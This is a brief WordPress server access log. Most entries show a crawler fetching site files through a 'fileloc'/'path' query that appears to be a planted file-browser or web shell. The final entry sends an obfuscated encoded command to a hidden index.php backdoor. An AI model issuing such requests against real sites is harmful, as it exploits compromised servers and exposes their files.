216.73.216.76 - - [17/Apr/2026:12:54:36 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes%2Ftwentytwentyone-pl_PL.po&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes HTTP/2" 200 10113 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:54:39 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes%2Ftwentytwentythree-fr_FR.po&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes HTTP/2" 200 5734 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:54:42 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes%2Ftwentytwentythree-nl_NL.po&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes HTTP/2" 200 5526 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:54:45 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fsodium_compat%2Flib%2F.htaccess&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fsodium_compat%2Flib HTTP/2" 200 2944 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:54:48 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes%2Fhello-elementor-el.mo&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes HTTP/2" 200 2847 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:54:51 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes%2Ftwentytwentyone-pt_PT.mo&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes HTTP/2" 200 2848 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [17/Apr/2026:12:52:58 +0300] "GET /wp-includes/block-supports/block-supports/index.php?ARRAY=7o2230223n313737363432333137382p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737363431393537382q3331666434306462653362323532323235336463313861313663323735343131222p2232223n223932643065616235646562393731363665653939613364353236323363323436222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36382q37342q38372q3330227q HTTP/1.0" 500 567 "-" "-"
